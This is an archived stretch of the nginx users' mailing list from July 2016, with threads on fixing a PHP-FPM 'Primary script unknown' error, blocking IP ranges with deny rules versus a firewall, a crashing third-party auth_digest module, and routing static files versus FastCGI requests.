should the IP space in blockedips.conf take > precedence? No. > > My thinking is this. If a certain IP (or more generally the entire IP > space of the entity) is known to be attempting hacks, why bother to > process the http request? I know I could block them in the firewall, > but blocking in the web server makes more sense to me. Why bother to accept such connection at all? There's no sense to accept connection in nginx and then discard it immediately. In your case it should be blocked on the system level. wbr, Valentin V. Bartenev From h.aboulfeth at genious.net Sat Jul 30 21:08:42 2016 From: h.aboulfeth at genious.net (Hamza Aboulfeth) Date: Sat, 30 Jul 2016 22:08:42 +0100 Subject: PHP-FPM Integration driving me mad In-Reply-To: <42b563a8-b7ce-88c0-6d26-24f328fd17e5@simonhoenscheid.de> References: <42b563a8-b7ce-88c0-6d26-24f328fd17e5@simonhoenscheid.de> Message-ID: <8D46FE11-569E-4759-B0F9-55CB23B7EFA5@genious.net> Hello, Run into the same issue myself yesterday, try disabling selinux, should fix your issue. Hamza > On 30 juil. 2016, at 21:44, Simon H?nscheid wrote: > > Hello List, > > due to a Server move, I was setting up a new nginx installation. Some of the pages need php. So far nothing new. When I start adding SCRIPT_FILENAME to the php location, it ends up that the script is no longer found. > > > ==> /var/log/nginx/www.example.com-error.log <== > 2016/07/30 21:21:15 [error] 5546#5546: *1 FastCGI sent in stderr: "Primary script unknown" while reading response header from upstream, client: xx.xxx.xxx.xxx, server: www.example.com, request: "GET /info.php HTTP/1.1", upstream: "fastcgi://unix:/var/run/fpmpool-www.socket:", host: "www.example.com" > > Do I leave it out, the script is handled but no output is retuned.(blank white page) I'm debugging this now for hours and dont get any usable result. Any help is appreciated. > > Nginx: 1.10.1 > PHP: 5.6.24 > OS: Debian 8.5 > > nginx conf: > > user www-data; > worker_processes 4; > pid /var/run/nginx.pid; > worker_rlimit_nofile 40960; > events { > use epoll; > worker_connections 4096; > } > http { > proxy_intercept_errors on; > fastcgi_intercept_errors on; > log_format main ''; > tcp_nopush on; > tcp_nodelay on; > keepalive_timeout 5; > sendfile on; > keepalive_requests 150; > include /etc/nginx/sites-enabled/*; > include /etc/nginx/mime.types; > open_file_cache max=40960 inactive=20s; > open_file_cache_valid 30s; > open_file_cache_min_uses 2; > open_file_cache_errors on; > gzip on; > gzip_min_length 10240; > gzip_proxied expired no-cache no-store private auth; > gzip_types text/plain text/css text/xml application/xml text/javascript application/x-javascript; > gzip_disable "MSIE [1-6]\."; > proxy_buffers 64 32k; > } > > the server itself: > > server { > server_name www.example.com; > listen xxx.xxx.xxx.xx:443 ssl http2; > access_log /var/log/nginx/www.example.com-access.log combined; > error_log /var/log/nginx/www.example.com-error.log notice; > ssl_protocols TLSv1.2 TLSv1.1 TLSv1; > ssl_ciphers EECDH+AESGCM:EDH+AESGCM:EECDH:EDH:MD5:!RC4:!LOW:!MEDIUM:!CAMELLIA:!ECDSA:!DES:!DSS:!3DES:!NULL; > charset utf-8; > index index.php index.html; > client_max_body_size 50M; > ssl_prefer_server_ciphers on; > ssl_session_cache shared:SSL:5m; > ssl_dhparam /etc/nginx/dhparam.pem; > ssl_certificate /opt/letsencrypt_certificates/nginx/www.example.com/fullchain.pem; > ssl_certificate_key /opt/letsencrypt_certificates/nginx/www.example.com/privkey.pem; > > location ~ /\. { > deny all; > access_log off; > log_not_found off; > } > location / { > try_files $uri $uri/ /index.php?q=$uri&$args; > root /var/www/www.example.com; > } > location ~ \.php$ { > fastcgi_buffers 16 4k; > fastcgi_index index.php; > fastcgi_pass unix:/var/run/fpmpool-www.socket; > include fastcgi_params; > } > } > > > PHP fpm config > [global] > pid = /var/run/php5-fpm.pid > error_log = /var/log/php5-fpm.log > syslog.facility = daemon > syslog.ident = php-fpm > log_level = notice > emergency_restart_threshold = 0 > emergency_restart_interval = 0 > process_control_timeout = 0 > include=/etc/php5/fpm/pool.d/*.conf > > > PHP pool config: > > listen = /var/run/fpmpool-www.socket > listen.backlog = -1 > listen.owner = www-data > listen.group = www-data > user = www-data > group = www-data > pm = dynamic > pm.max_children = 25 > pm.start_servers = 10 > pm.min_spare_servers = 10 > pm.max_spare_servers = 20 > pm.max_requests = 500 > pm.status_path = /fpm-status > ping.response = pong > request_terminate_timeout = 60s > request_slowlog_timeout = 0 > slowlog = /var/log/php-fpm/www-slow.log > rlimit_files = 32000 > rlimit_core = unlimited > catch_workers_output = yes > > > old PHP Location, on old server was: > > location ~* \.php$ { > fastcgi_buffers 16 4k; > fastcgi_index index.php; > fastcgi_pass 127.0.0.1:9000; > include fastcgi_params; > fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; > fastcgi_param SCRIPT_URI http://$http_host$request_uri; > fastcgi_param SCRIPT_URL $request_uri; > fastcgi_param SERVER_NAME $http_host; > } > > Kind Regards > Simon > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From mailinglisten at simonhoenscheid.de Sat Jul 30 21:38:27 2016 From: mailinglisten at simonhoenscheid.de (=?UTF-8?Q?Simon_H=c3=b6nscheid?=) Date: Sat, 30 Jul 2016 23:38:27 +0200 Subject: PHP-FPM Integration driving me mad In-Reply-To: <8D46FE11-569E-4759-B0F9-55CB23B7EFA5@genious.net> References: <42b563a8-b7ce-88c0-6d26-24f328fd17e5@simonhoenscheid.de> <8D46FE11-569E-4759-B0F9-55CB23B7EFA5@genious.net> Message-ID: Hey, Debian has no selinux. Kind Regards Simon Am 30.07.16 um 23:08 schrieb Hamza Aboulfeth: > Hello, > > Run into the same issue myself yesterday, try disabling selinux, should fix your issue. > > Hamza > >> On 30 juil. 2016, at 21:44, Simon H?nscheid wrote: >> >> Hello List, >> >> due to a Server move, I was setting up a new nginx installation. Some of the pages need php. So far nothing new. When I start adding SCRIPT_FILENAME to the php location, it ends up that the script is no longer found. >> >> >> ==> /var/log/nginx/www.example.com-error.log <== >> 2016/07/30 21:21:15 [error] 5546#5546: *1 FastCGI sent in stderr: "Primary script unknown" while reading response header from upstream, client: xx.xxx.xxx.xxx, server: www.example.com, request: "GET /info.php HTTP/1.1", upstream: "fastcgi://unix:/var/run/fpmpool-www.socket:", host: "www.example.com" >> >> Do I leave it out, the script is handled but no output is retuned.(blank white page) I'm debugging this now for hours and dont get any usable result. Any help is appreciated. >> >> Nginx: 1.10.1 >> PHP: 5.6.24 >> OS: Debian 8.5 >> >> nginx conf: >> >> user www-data; >> worker_processes 4; >> pid /var/run/nginx.pid; >> worker_rlimit_nofile 40960; >> events { >> use epoll; >> worker_connections 4096; >> } >> http { >> proxy_intercept_errors on; >> fastcgi_intercept_errors on; >> log_format main ''; >> tcp_nopush on; >> tcp_nodelay on; >> keepalive_timeout 5; >> sendfile on; >> keepalive_requests 150; >> include /etc/nginx/sites-enabled/*; >> include /etc/nginx/mime.types; >> open_file_cache max=40960 inactive=20s; >> open_file_cache_valid 30s; >> open_file_cache_min_uses 2; >> open_file_cache_errors on; >> gzip on; >> gzip_min_length 10240; >> gzip_proxied expired no-cache no-store private auth; >> gzip_types text/plain text/css text/xml application/xml text/javascript application/x-javascript; >> gzip_disable "MSIE [1-6]\."; >> proxy_buffers 64 32k; >> } >> >> the server itself: >> >> server { >> server_name www.example.com; >> listen xxx.xxx.xxx.xx:443 ssl http2; >> access_log /var/log/nginx/www.example.com-access.log combined; >> error_log /var/log/nginx/www.example.com-error.log notice; >> ssl_protocols TLSv1.2 TLSv1.1 TLSv1; >> ssl_ciphers EECDH+AESGCM:EDH+AESGCM:EECDH:EDH:MD5:!RC4:!LOW:!MEDIUM:!CAMELLIA:!ECDSA:!DES:!DSS:!3DES:!NULL; >> charset utf-8; >> index index.php index.html; >> client_max_body_size 50M; >> ssl_prefer_server_ciphers on; >> ssl_session_cache shared:SSL:5m; >> ssl_dhparam /etc/nginx/dhparam.pem; >> ssl_certificate /opt/letsencrypt_certificates/nginx/www.example.com/fullchain.pem; >> ssl_certificate_key /opt/letsencrypt_certificates/nginx/www.example.com/privkey.pem; >> >> location ~ /\. { >> deny all; >> access_log off; >> log_not_found off; >> } >> location / { >> try_files $uri $uri/ /index.php?q=$uri&$args; >> root /var/www/www.example.com; >> } >> location ~ \.php$ { >> fastcgi_buffers 16 4k; >> fastcgi_index index.php; >> fastcgi_pass unix:/var/run/fpmpool-www.socket; >> include fastcgi_params; >> } >> } >> >> >> PHP fpm config >> [global] >> pid = /var/run/php5-fpm.pid >> error_log = /var/log/php5-fpm.log >> syslog.facility = daemon >> syslog.ident = php-fpm >> log_level = notice >> emergency_restart_threshold = 0 >> emergency_restart_interval = 0 >> process_control_timeout = 0 >> include=/etc/php5/fpm/pool.d/*.conf >> >> >> PHP pool config: >> >> listen = /var/run/fpmpool-www.socket >> listen.backlog = -1 >> listen.owner = www-data >> listen.group = www-data >> user = www-data >> group = www-data >> pm = dynamic >> pm.max_children = 25 >> pm.start_servers = 10 >> pm.min_spare_servers = 10 >> pm.max_spare_servers = 20 >> pm.max_requests = 500 >> pm.status_path = /fpm-status >> ping.response = pong >> request_terminate_timeout = 60s >> request_slowlog_timeout = 0 >> slowlog = /var/log/php-fpm/www-slow.log >> rlimit_files = 32000 >> rlimit_core = unlimited >> catch_workers_output = yes >> >> >> old PHP Location, on old server was: >> >> location ~* \.php$ { >> fastcgi_buffers 16 4k; >> fastcgi_index index.php; >> fastcgi_pass 127.0.0.1:9000; >> include fastcgi_params; >> fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; >> fastcgi_param SCRIPT_URI http://$http_host$request_uri; >> fastcgi_param SCRIPT_URL $request_uri; >> fastcgi_param SERVER_NAME $http_host; >> } >> >> Kind Regards >> Simon >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From me at myconan.net Sat Jul 30 21:43:58 2016 From: me at myconan.net (Edho Arief) Date: Sun, 31 Jul 2016 06:43:58 +0900 Subject: PHP-FPM Integration driving me mad In-Reply-To: <42b563a8-b7ce-88c0-6d26-24f328fd17e5@simonhoenscheid.de> References: <42b563a8-b7ce-88c0-6d26-24f328fd17e5@simonhoenscheid.de> Message-ID: <1469915038.659917.681402849.793AD758@webmail.messagingengine.com> Hi, On Sun, Jul 31, 2016, at 05:44, Simon H?nscheid wrote: > server { > server_name www.example.com; > listen xxx.xxx.xxx.xx:443 ssl http2; > access_log /var/log/nginx/www.example.com-access.log combined; > error_log /var/log/nginx/www.example.com-error.log notice; > ssl_protocols TLSv1.2 TLSv1.1 TLSv1; > ssl_ciphers > EECDH+AESGCM:EDH+AESGCM:EECDH:EDH:MD5:!RC4:!LOW:!MEDIUM:!CAMELLIA:!ECDSA:!DES:!DSS:!3DES:!NULL; > charset utf-8; > index index.php index.html; > client_max_body_size 50M; > ssl_prefer_server_ciphers on; > ssl_session_cache shared:SSL:5m; > ssl_dhparam /etc/nginx/dhparam.pem; > ssl_certificate > /opt/letsencrypt_certificates/nginx/www.example.com/fullchain.pem; > ssl_certificate_key > /opt/letsencrypt_certificates/nginx/www.example.com/privkey.pem; > > location ~ /\. { > deny all; > access_log off; > log_not_found off; > } > location / { > try_files $uri $uri/ /index.php?q=$uri&$args; > root /var/www/www.example.com; > } > location ~ \.php$ { > fastcgi_buffers 16 4k; > fastcgi_index index.php; > fastcgi_pass unix:/var/run/fpmpool-www.socket; > include fastcgi_params; > } > } > I think you're missing `root` directive either at server or php's location block and `SCRIPT_FILENAME` in php's location block. From lists at lazygranch.com Sun Jul 31 01:15:04 2016 From: lists at lazygranch.com (lists at lazygranch.com) Date: Sat, 30 Jul 2016 18:15:04 -0700 Subject: Hierarchy of malformed requests and blocked IPs In-Reply-To: <6477113.d8pPmRZ3H4@vbart-laptop> References: <20160730060105.5501012.85163.7747@lazygranch.com> <3493118.aR1ooWoyal@vbart-laptop> <20160730105246.12c5aad4@linux-h57q.site> <6477113.d8pPmRZ3H4@vbart-laptop> Message-ID: <20160730181504.7ea3661a@linux-h57q.site> On Sat, 30 Jul 2016 23:49:30 +0300 "Valentin V. Bartenev" wrote: > On Saturday 30 July 2016 10:52:46 lists at lazygranch.com wrote: > > On Sat, 30 Jul 2016 13:18:47 +0300 > > "Valentin V. Bartenev" wrote: > > > > > On Friday 29 July 2016 23:01:05 lists at lazygranch.com wrote: > > > > I see a fair amount of hacking attempts in the access.log. That > > > > is, they > > > show up with a return code of 400 (malformed). Well yeah, they are > > > certainly malformed. But when I add the offending IP address to my > > > blocked list, they still show up as malformed upon subsequent > > > readings of access.log. That is, it appears to me that nginx isn't > > > checking the blocked list first. > > > > > > > > If true, shouldn't the blocked IPs take precedence? > > > > > > > > Nginx 1.10.1 on freebsd 10.2 > > > > > > > > > > It's unclear what do you mean by "my blocked list". But if you're > > > speaking about "ngx_http_access_module" then the answer is no, it > > > shouldn't take precedence. It works on a location basis, which > > > implies that the request has been parsed already. > > > > > > wbr, Valentin V. Bartenev > > > > > > _______________________________________________ > > > > My "blocked IPs" are implemented as follows. In nginx.conf: > > ------------------ > > http { > > include mime.types; > > include /usr/local/etc/nginx/blockips.conf; > > ------------------------------------- > > > > Tne format of the blockips.conf file: > > ------------------ > > #haliburton > > deny 34.183.197.69 ; > > #cloudflare > > deny 103.21.244.0/22 ; > > deny 103.22.200.0/22 ; > > deny 103.31.4.0/22 ; > > ------------------------------- > > The "deny" directive comes from ngx_http_access_module. > > See the documentation: > http://nginx.org/en/docs/http/ngx_http_access_module.html > > > > > > Running "make config" in the nginx ports, I don't see > > "ngx_http_access_module" as an option, nor anything similar. > > > [..] > > It's a standard module, which is usually built by default. > > > > So given this set up, should the IP space in blockedips.conf take > > precedence? > > No. > > > > > > My thinking is this. If a certain IP (or more generally the entire > > IP space of the entity) is known to be attempting hacks, why bother > > to process the http request? I know I could block them in the > > firewall, but blocking in the web server makes more sense to me. > > Why bother to accept such connection at all? There's no sense > to accept connection in nginx and then discard it immediately. > > In your case it should be blocked on the system level. > > wbr, Valentin V. Bartenev > > _______________________________________________ I can do the blocking in the firewall, but I could see a scenario where a web hosting provider would want to do web blocking on a per domain basis. That is, what one customer wants to be blocks will not be what all customers want blocked. So it seems to me if the IP could be checked first within nginx,there is value in that. In my case, I only want to block web access, which I assume I can do via the firewall. My point being the web server has a significantly larger attack surface than email. So while I would want to block access to my nginx server, I would allow email access from the same "blocked" IP. After all, the user I blocked might want to email the webmaster to inquire why they are blocked. Or there are multiple domains at the same IP, and not everyone is a hacker. Eyeballs generally come from ISPs and schools. Datacenters are not eyeballs, Yeah, people surf from work, but if you block some corporate server that has been attempting to hack your server, so be it. Email on the other had DOES come from datacenters, so they shouldn't be blocked from 25. From nginx-forum at forum.nginx.org Sun Jul 31 06:09:13 2016 From: nginx-forum at forum.nginx.org (itpp2012) Date: Sun, 31 Jul 2016 02:09:13 -0400 Subject: Hierarchy of malformed requests and blocked IPs In-Reply-To: <20160730181504.7ea3661a@linux-h57q.site> References: <20160730181504.7ea3661a@linux-h57q.site> Message-ID: See https://forum.nginx.org/read.php?2,267651 at this level nginx is not an advanced all layer firewall/ids/dds tool. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268629,268646#msg-268646 From mailinglisten at simonhoenscheid.de Sun Jul 31 07:07:27 2016 From: mailinglisten at simonhoenscheid.de (=?UTF-8?Q?Simon_H=c3=b6nscheid?=) Date: Sun, 31 Jul 2016 09:07:27 +0200 Subject: [FIXED]PHP-FPM Integration driving me mad In-Reply-To: <1469915038.659917.681402849.793AD758@webmail.messagingengine.com> References: <42b563a8-b7ce-88c0-6d26-24f328fd17e5@simonhoenscheid.de> <1469915038.659917.681402849.793AD758@webmail.messagingengine.com> Message-ID: Hey Edho, Thanks a lot! Fixed! Kind Regards Simon Am 30.07.16 um 23:43 schrieb Edho Arief: > Hi, > > On Sun, Jul 31, 2016, at 05:44, Simon H?nscheid wrote: >> server { >> server_name www.example.com; >> listen xxx.xxx.xxx.xx:443 ssl http2; >> access_log /var/log/nginx/www.example.com-access.log combined; >> error_log /var/log/nginx/www.example.com-error.log notice; >> ssl_protocols TLSv1.2 TLSv1.1 TLSv1; >> ssl_ciphers >> EECDH+AESGCM:EDH+AESGCM:EECDH:EDH:MD5:!RC4:!LOW:!MEDIUM:!CAMELLIA:!ECDSA:!DES:!DSS:!3DES:!NULL; >> charset utf-8; >> index index.php index.html; >> client_max_body_size 50M; >> ssl_prefer_server_ciphers on; >> ssl_session_cache shared:SSL:5m; >> ssl_dhparam /etc/nginx/dhparam.pem; >> ssl_certificate >> /opt/letsencrypt_certificates/nginx/www.example.com/fullchain.pem; >> ssl_certificate_key >> /opt/letsencrypt_certificates/nginx/www.example.com/privkey.pem; >> >> location ~ /\. { >> deny all; >> access_log off; >> log_not_found off; >> } >> location / { >> try_files $uri $uri/ /index.php?q=$uri&$args; >> root /var/www/www.example.com; >> } >> location ~ \.php$ { >> fastcgi_buffers 16 4k; >> fastcgi_index index.php; >> fastcgi_pass unix:/var/run/fpmpool-www.socket; >> include fastcgi_params; >> } >> } >> > I think you're missing `root` directive either at server or php's > location block and `SCRIPT_FILENAME` in php's location block. > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From mdounin at mdounin.ru Sun Jul 31 22:53:43 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 1 Aug 2016 01:53:43 +0300 Subject: Auth_digest not working In-Reply-To: <01c22c88-23f9-d38d-5ce2-0bdcb6c89f3d@fechner.net> References: <01c22c88-23f9-d38d-5ce2-0bdcb6c89f3d@fechner.net> Message-ID: <20160731225343.GC57459@mdounin.ru> Hello! On Sat, Jul 30, 2016 at 06:03:47PM +0200, Matthias Fechner wrote: > I have a very simple webserver running with php-fpm connected (to handle > php scripts). > It is running perfectly fine without authentication (on a FreeBSD > installation). > > If I enable auth_digest (which is enabled in the FreeBSD port I > compiled), I see only in the main error log the line: > 2016/07/30 17:55:54 [alert] 7280#102036: worker process 7318 exited on > signal 11 The auth_digest module is a 3rd party one. And the message suggests there is a bug in it, or it's not compatible with the current version of nginx. You may consider using an official module instead, auth_basic. See here for details: http://nginx.org/en/docs/http/ngx_http_auth_basic_module.html -- Maxim Dounin http://nginx.org/ From denis.papathanasiou at gmail.com Sun Jul 31 22:55:54 2016 From: denis.papathanasiou at gmail.com (Denis Papathanasiou) Date: Sun, 31 Jul 2016 18:55:54 -0400 Subject: Configuring nginx for both static pages and fcgi simultaneously Message-ID: I have the following configuration file defined in /etc/nginx/conf.d/my-project.conf (this is on debian). It does what I want, in that it serves static contet in the /css, /images, /js folders along with index.html correctly. And for dynamic requests (I'm running an fcgi-enabled server on port 9001) to /contact, /login, and /singup it also works correctly. I would just like to be able to declare that anything *except* index.html, /css, /images, and /js, it should all go to the fcgi server. I've experimented with various definitions of "location", but the only one that seems to work is the one I have below, where all the possible fcgi paths are defined explicitly. Is there a better, simpler way of doing this? server { listen 80; listen [::]:80 default_server ipv6only=on; ## listen for ipv6 server_name localhost; root /var/www/my-project/html; location / { index index.html; } location /images/ { root /var/www/my-project/html; } location /css/ { root /var/www/my-project/html; } location /js/ { root /var/www/my-project/html; } location ~ ^/(contact|login|signup)$ { include /etc/nginx/fastcgi_params; fastcgi_pass 127.0.0.1:9001; } } -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Sun Jul 31 23:15:29 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 1 Aug 2016 02:15:29 +0300 Subject: Configuring nginx for both static pages and fcgi simultaneously In-Reply-To: References: Message-ID: <20160731231529.GD57459@mdounin.ru> Hello! On Sun, Jul 31, 2016 at 06:55:54PM -0400, Denis Papathanasiou wrote: > I have the following configuration file defined in > /etc/nginx/conf.d/my-project.conf (this is on debian). > > It does what I want, in that it serves static contet in the /css, /images, > /js folders along with index.html correctly. > > And for dynamic requests (I'm running an fcgi-enabled server on port 9001) > to /contact, /login, and /singup it also works correctly. > > I would just like to be able to declare that anything *except* index.html, > /css, /images, and /js, it should all go to the fcgi server. > > I've experimented with various definitions of "location", but the only > one that seems to work is the one I have below, where all the possible > fcgi paths are defined explicitly. > > Is there a better, simpler way of doing this? So, you need to pass to fastcgi anything except /, /index.html, and anything starting with /css/, /images/, and /js/, right? Most simple solution would be exactly this, by defining a catch-all "location /" to pass anything to fastcgi, and explicitly excluding required paths using additional locations: root /var/www/my-project/html; index index.html; location / { fastcgi_pass ... include fastcgi_params; } location = / {} location = /index.html {} location /css/ {} location /images/ {} location /js/ {} -- Maxim Dounin http://nginx.org/ From r1ch+nginx at teamliquid.net Sun Jul 31 23:38:29 2016 From: r1ch+nginx at teamliquid.net (Richard Stanway) Date: Mon, 1 Aug 2016 01:38:29 +0200 Subject: Configuring nginx for both static pages and fcgi simultaneously In-Reply-To: <20160731231529.GD57459@mdounin.ru> References: <20160731231529.GD57459@mdounin.ru> Message-ID: Are you sure you don't want to use try_files for this? http://nginx.org/en/docs/http/ngx_http_core_module.html#try_files On Mon, Aug 1, 2016 at 1:15 AM, Maxim Dounin wrote: > Hello! > > On Sun, Jul 31, 2016 at 06:55:54PM -0400, Denis Papathanasiou wrote: > > > I have the following configuration file defined in > > /etc/nginx/conf.d/my-project.conf (this is on debian). > > > > It does what I want, in that it serves static contet in the /css, > /images, > > /js folders along with index.html correctly. > > > > And for dynamic requests (I'm running an fcgi-enabled server on port > 9001) > > to /contact, /login, and /singup it also works correctly. > > > > I would just like to be able to declare that anything *except* > index.html, > > /css, /images, and /js, it should all go to the fcgi server. > > > > I've experimented with various definitions of "location", but the only > > one that seems to work is the one I have below, where all the possible > > fcgi paths are defined explicitly. > > > > Is there a better, simpler way of doing this? > > So, you need to pass to fastcgi anything except /, /index.html, > and anything starting with /css/, /images/, and /js/, right? > > Most simple solution would be exactly this, by defining a catch-all > "location /" to pass anything to fastcgi, and explicitly excluding > required paths using additional locations: > > root /var/www/my-project/html; > index index.html; > > location / { > fastcgi_pass ... > include fastcgi_params; > } > > location = / {} > location = /index.html {} > location /css/ {} > location /images/ {} > location /js/ {} > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Sun Jul 31 23:50:44 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 1 Aug 2016 02:50:44 +0300 Subject: Configuring nginx for both static pages and fcgi simultaneously In-Reply-To: References: <20160731231529.GD57459@mdounin.ru> Message-ID: <20160731235044.GF57459@mdounin.ru> Hello! On Mon, Aug 01, 2016 at 01:38:29AM +0200, Richard Stanway wrote: > Are you sure you don't want to use try_files for this? If a required handling is known in advance there is no need to use try_files and waste resources on it. -- Maxim Dounin http://nginx.org/